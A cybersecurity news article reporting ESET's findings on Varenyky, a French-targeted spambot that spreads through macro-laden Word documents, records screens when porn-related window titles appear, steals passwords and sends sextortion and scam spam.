Threat Management, Malware

Varenyky malware records porn on screen, distributes sextortion spam

A cybercriminal operation that's been targeting France since May is attempting to distribute malware capable of recording the screens of victims who visit pornographic websites.

In other cases, the malware sends out spam emails that merely intend to trick victims into believing their web sessions were recorded while they watched porn, even though they were not. This spambot functionality has also been used to send out sketchy surveys and promotions designed to entice victims into entering their personal and credit card information.

Dubbed Varenyky, the malware also can deploy and abuse NirSoft’s WebBrowserPassView and Mail PassView password recovery tools for web browsers and email clients in order to steal victims' passwords. Varenyky has been previously referenced on Twitter by malware analysis service ANY.RUN. But last week, researchers from ESET published a blog post that provided further details into the threat.

"This spambot is not very advanced, but the context and story around it make it interesting," the ESET blog post states. "Many functions have been added and then quickly removed across many different versions in a short period of time (two months). This shows that the operators are actively working on their botnet and are inclined to experiment with new features that could bring a better monetization of their work."

According to ESET, Varenyky is currently distributed in email phishing campaigns featuring Word documents embedded with malicious macros. The macros serve two functions: checking a computer's language ID to specifically target victims in France, and then downloading and executing the malware. Upon successful infection, the spambot communicates with its command-and-control server via Tor.

Early versions of the malware were able to scan the titles of open windows on the computer for words related to porn or bitcoin, and then send those titles to the C2 server. Varenyky's developers later enhanced this feature to record the computer screen using an FFmpeg executive, whenever the malware detected the word "sexe." The malware would then later upload the video to the C2 server.

"It’s unknown if these videos were recorded out of curiosity by the author(s) of the spambot or with an intention to monetize them through sextortion," the ESET blog post states. However, the researchers believe the attackers have so far "not leveraged these [videos] as far as we can tell."

The attackers behind Varenyky actually did launch a sextortion campaign of sorts on July 22, although it did not involve any secret recordings of pornographic content. Rather, the spambot sent out a French version of a common sextortion email seen since last year that falsely claims that the victim was caught on camera viewing pornographic materials. In that emailed threat, the attackers threaten to share an embarrassing video of both the victim and whatever pornographic content he was supposedly viewing to several of his contacts.

But this is just one of multiple spam campaigns launched by the attackers. Varenyky sends spam email via the SMTP protocol via port 25, specifically targeting customers of the French ISP Orange S.A. "The mail servers used to relay the spam don’t look like they belong to the malicious actors; they look like servers that have not been properly secured and they don’t require authentication," ESET explains in its report.

Spam messages are typically designed to persuade recipients into clicking a link or opening an attachment. In some cases, this resulted in spam recipients being led to a scam survey and promotion that encourages them to enter their personal information and credit card data. Those who do later may find that they are being charged monthly fees they never signed up for.

Varenyky's developers continue to evolve their product, most recently adding a malicious command for creating hidden desktops on computers. "The malware can be directed to start various applications that have a graphical interface, such as web browsers and the Windows Run dialog on this invisible desktop," ESET reports. "It has the ability to accomplish various tasks, such as navigating menus, reading text, taking screenshots, clicking on the screen and also minimizing, restoring and maximizing windows."

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.